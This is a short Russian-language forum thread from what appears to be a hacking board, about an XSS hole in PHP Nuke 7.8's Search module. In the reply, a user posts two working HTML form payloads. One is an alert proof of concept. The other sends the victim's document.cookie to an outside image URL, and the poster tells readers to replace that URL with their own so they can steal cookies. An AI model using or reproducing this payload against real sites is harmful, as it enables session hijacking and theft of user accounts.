XSS в PHP Nuke 7.8

Discussion in 'Песочница' started by {BuT@Min}, 16 Jan 2007.

  1. {BuT@Min}

    {BuT@Min} Elder - Старейшина

    Joined:
    23 Nov 2006
    Messages:
    43
    Likes Received:
    5
    Reputations:
    -1
    :D
     
    #1 {BuT@Min}, 16 Jan 2007
    Last edited: 4 Dec 2009
    2 people like this.
  2. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    маладец что нашел...+++

    просто алерт
    HTML:
    <form action="http://nuke/modules.php?name=Search" method="post">
<input type=hidden name="query" value='search"style="search"style="background:url(javascript:alert())'>
<input type="submit" value="Искать">
</form>
    по идее должно воровать куки...только поменяй ]http://antichat.org/s/HakNet.gif на свой.
    HTML:
    <form action="http://nuke/modules.php?name=Search" method="post">
<input type=hidden name="query" value='search"style="background:url(javascript:img=new
Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;)'>
<input type="submit" value="Искать">
</form>
    что с етим делать)) четай
    здесь
     
    #2 Micr0b, 17 Jan 2007
    Last edited: 17 Jan 2007
    1 person likes this.
(You must log in or sign up to post here.)